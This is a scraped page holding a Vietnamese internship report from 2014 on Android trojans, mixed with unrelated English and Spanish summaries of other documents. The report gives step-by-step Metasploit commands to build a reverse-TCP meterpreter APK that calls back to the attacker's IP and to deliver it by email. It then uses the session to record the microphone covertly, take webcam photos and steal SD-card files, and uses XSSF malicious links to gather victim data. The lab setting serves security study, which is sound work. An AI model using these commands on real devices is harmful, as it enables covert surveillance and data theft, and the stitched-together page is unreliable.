Báo cao thực tập Athena tuần 3,4 :
Đề tài : Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC:
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Este documento contiene definiciones breves de términos como disyuntiva, etimología y nexo. También incluye preguntas sobre cómo la cultura influye en el desarrollo tecnológico, si la tecnología es neutral culturalmente, qué tecnologías son apropiadas para países en desarrollo y si la cultura del mantenimiento depende del nivel de conciencia cultural y tecnológica.
This document provides tips and sample answers for common interview questions for a position at Airkix. It includes responses to questions about previous employment, interest in the company, knowledge of the company, why the applicant should be hired, what they can offer the company, salary expectations, and questions to ask the interviewer. The tips emphasize staying positive, researching the company, linking skills and experience to the role, portraying enthusiasm and commitment, and asking about professional development rather than compensation. Additional materials and other interview advice are also referenced.
When you ask someone between the ages of around 16 to 30 “What was the first major social networking site to arrive on the internet?” chances are they’ll respond with Facebook. But one can safely estimate that nearly half of those people had a profile on MySpace before Facebook even existed.
This document provides a profile for a presentation consulting service from 2014. It focuses on their specialization in presentation skills training and coaching for clients. Their services help improve clients' abilities to effectively deliver presentations and communicate their messages.
This document contains a list of names and phone numbers. There are over 100 entries consisting of names followed by 10-digit phone numbers. The names and numbers are listed in no particular order.
Este documento contiene definiciones breves de términos como disyuntiva, etimología y nexo. También incluye preguntas sobre cómo la cultura influye en el desarrollo tecnológico, si la tecnología es neutral culturalmente, qué tecnologías son apropiadas para países en desarrollo y si la cultura del mantenimiento depende del nivel de conciencia cultural y tecnológica.
This document provides tips and sample answers for common interview questions for a position at Airkix. It includes responses to questions about previous employment, interest in the company, knowledge of the company, why the applicant should be hired, what they can offer the company, salary expectations, and questions to ask the interviewer. The tips emphasize staying positive, researching the company, linking skills and experience to the role, portraying enthusiasm and commitment, and asking about professional development rather than compensation. Additional materials and other interview advice are also referenced.
When you ask someone between the ages of around 16 to 30 “What was the first major social networking site to arrive on the internet?” chances are they’ll respond with Facebook. But one can safely estimate that nearly half of those people had a profile on MySpace before Facebook even existed.
This document provides a profile for a presentation consulting service from 2014. It focuses on their specialization in presentation skills training and coaching for clients. Their services help improve clients' abilities to effectively deliver presentations and communicate their messages.
This document contains a list of names and phone numbers. There are over 100 entries consisting of names followed by 10-digit phone numbers. The names and numbers are listed in no particular order.
Este documento contiene definiciones de términos como disyuntiva, etimología, nexo y profano. También incluye preguntas sobre cómo la cultura influye en el desarrollo tecnológico, si la tecnología es neutral culturalmente, qué tecnologías son apropiadas para países en desarrollo y si la cultura del mantenimiento depende del nivel de conciencia cultural y tecnológica.
This document provides information about open positions on the National Support Team (NST) in AIESEC Thailand for 2015-2016. It begins with an introduction about the rewarding experience of working on the NST to support AIESEC's operations.
The document then outlines the various NST roles across different functions, including International Relations Manager and Project Quality Manager for the International Global Citizen Development Program, Japan Market Coordinator for the International Global Internship Program, YouthSpeak Coordinator and Design Teamster for Marketing and Communications, and LDM Coach for Talent and Membership.
For each role, it provides the required skills, time commitment expected, responsibilities, and metrics for evaluating success. It emphasizes developing leadership and receiving
Luisa De Roo is the head of an interior design firm based in Woodstock, Illinois who frequently travels for work and enjoys learning about local cuisines. One place she has visited is Hong Kong, which is known for its rich culinary culture including unique dishes like snake soup made from shredded snake meat in a broth with seafood and mushrooms. Baked goods are also popular in Hong Kong, especially meat and custard tarts made with puff or short crust pastry. Another favorite Hong Kong dish is hot pot, where diners cook items like fish balls, vegetables and raw meats by dipping them in a clear broth.
1. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
BÁO CÁO ĐỀ TÀI THỰC TẬP
ĐỀ TÀI:
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH
CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI.
GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG
SINH VIÊN THỰC HIỆN: NGUYỄN XUÂN NGỌC
BÁO CÁO TUẦN 3-4
(14/08/2014 – 28/08/2014)
Trang 1
2. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Trang 2
Nội dung:
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ
VIRTUALBOX
Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy
android (có thể là smartphone, tablet…).
Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào
thiết bị chạy android.
1. Các Tools cần thi ết để cài đặt:
- Phần mềm Virtual Box.
- Phần mềm Genymotion.
- Bộ công cụ phát triển Java SE Development Kit.
- Bộ công cụ Android SDK Manager.
2. Tải và cài đặt JDK – Java SE Development Kit:
Bước 1: Tải JDK tại
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-
1880260.html
Click chọn “Accept License Agreement”
Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
3. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa
chọn Next. Cuối cùng click Close
Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe
Trang 3
Gõ lệnh “java <Enter>”.
4. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
3. Tải về và cài đặt Android SDK Manager:
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html
Click vào I have read and agree… và chọn phiên bản 64-bit
Click Download
Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe
Lưu ý là có thể gặp lỗi Fetching https://dl -sll ... Failed to fetch… Close
Trang 4
thông báo này lại.
Xuất hiển cửa sổ Choose Packages to Install . Nếu cửa sổ này rỗng >
Cancel
Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô
Force https://...
Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager
Ta chọn các Packages muốn cài. Và Install
5. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License >
Trang 5
Install > Chờ hoàn tất.
6. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
4. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox:
Ta có thể bản VirtualBox phù hợp với máy của bạn.
- Bước 1: Ta tải về file cài đặt VirtualBox tại trang:
http://www.oracle.com/technetwork/server-storage/
virtualbox/downloads/index.html
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
Bước 3: Next > Next > Next > Install > Finish
Trang 6
7. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 4: Giao diện phần mềm sau khi cài đặt xong.
5. Tải về và cài đặt ứng dụng Genymotion:
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com
Ta có thể đăng ký miễn phí và tải Genymotion về máy.
Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt >
OK > Next
Bước 3: Chọn thư mục lưu cài đặt.
Trang 7
8. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 4: Next > Next > Install > Finish
Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục
Settings
Trang 8
9. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web
www.genymotion.com ở thẻ General
Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường
dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó
lưu lại cài đặt.
F: Softadt-bundle-windows-x86_64-20140702sdk
Trang 9
10. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
6. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox:
Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add
Bước 2: Chọn tên thiết bị mà muốn làm máy ảo.
Xuất hiện cấu hình máy ảo sắp tạo:
Trang
10
11. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo.
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.
Trang
11
13. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ
ANDROID:
Trang
13
1. Các công cụ cần thi ết:
Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị:
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng
VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo
tablet chạy Android 4.3.
- Cả 2 thiết bị đều có thể kết nối mạng.
- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị.
2. Tiến trình:
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.
Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được
internet.
Vào Edit > Virtual Network Editor…
Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở
ô Bridged to.
14. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig”
Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng
dụng *.apk và gửi qua email.
Trang
14
15. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa
chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên
file>”
Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136
lport=8080 R > /root/Desktop/appsX.apk.
- Tạo ứng dụng ReverseTCP có trên file là appsX.apk.
- Địa chỉ IP máy tấn công là 192.168.149.136.
- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023).
- Lưu file tại Desktop.
Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh:
“msfconsole”
Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh:
“set payload android/meterpreter/reverse_tcp”
“set lhost 192.168.149.136”
“set lport 8080”
Trang
15
16. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công.
Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng
dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP.
Trang
16
17. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.
Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.
Trang
17
18. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Trang
18
3. Khai thác thông tin hê thống:
Xem thông tin hệ thống bằng lệnh “sysinfo”.
4. Ghi âm lén:
Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh
“record_mic”.
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali .
5. Khai thác webcam và chụp ảnh lén:
Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh
lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã
webcam>”.
19. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali .
6. Khai thác file hệ thống của máy nạn nhân:
Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
Trang
19
20. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Trang
20
7. Khai thác dữ liệu từ SDCARD:
Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”.
Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD.
Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd
Download” và lệnh liệt kê “ls”.
Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”.
Ở đây dùng lệnh “download appsX.apk”.
Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn
công Kali.
8. Kết thúc tấn công:
Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
21. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA
MÃ ĐỘC:
Trang
21
1. Các công cụ cần thi ết:
Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần
chuẩn bị như tấn công bằng file mã độc ở trên:
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng
VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo
tablet chạy Android 4.3.
- Cả 2 thiết bị đều có thể kết nối mạng.
- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị.
2. Tiến trình:
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.
Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật
Framework
“msfupdate”
“cd /opt/metasploit/apps/pro/msf3”
“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force”
Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
22. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true
Trang
22
Mode=Verbose”
Bước 5: Thực hiện lệnh “xssf_urls”
Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test
page, XSSF logs page…
23. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page:
Trang
23
http://192.168.149.136:80/xssf/test.html
Ta nhận được thông báo trên máy tấn công Kali:
3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc:
Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường
dẫn mã độc http://192.168.149.136:80/xssf/test.html
4. Xem thông tin về nạn nhân đang truy cập:
Dùng lệnh “xssf_information <ID máy nạn nhân>”
Ở đây ví dụ là “xssf_information 1”
24. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
5. Khai thác dữ liệu từ máy nạn nhân:
Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có
Trang
24
thể thao tác lên máy nạn nhân
Gửi Thông báo XSSF đến máy nạn nhân qua lệnh:
“use auxiliary/xssf/public/misc/alert”
“run”
25. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Ở máy nạn nhân sẽ nhận được cảnh báo XSSF
Thoát ra msf bằng lệnh “Ctrl+C” > “back”
Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không
bằng lệnh:
“use auxiliary/xssf/public/misc/visited_pages”
“run”
Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa:
“use auxiliary/gather/android_htmlfileprovider”
“set SRVPORT 87”
“set URIPATH /”
“run”
Trang
25
26. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/
Ta nhận được thông tin máy nạn nhân:
6. Thoát khỏi XSSF của Metasploit:
Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
Trang
26
27. GVHD : VÕ ĐỖ THẮNG
August 28, 2014
Trang
27
IV – NGUỒN THAM KHẢO
http://www.oracle.com/technetwork/server-storage/
virtualbox/downloads/index.html
http://www.genymotion.com/
http://developer.android.com/sdk/index.html#download
http://www.oracle.com/technetwork/java/javase/downloads
http://www.whitehat.vn/threads/
Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA –
www.Athena.Edu.Vn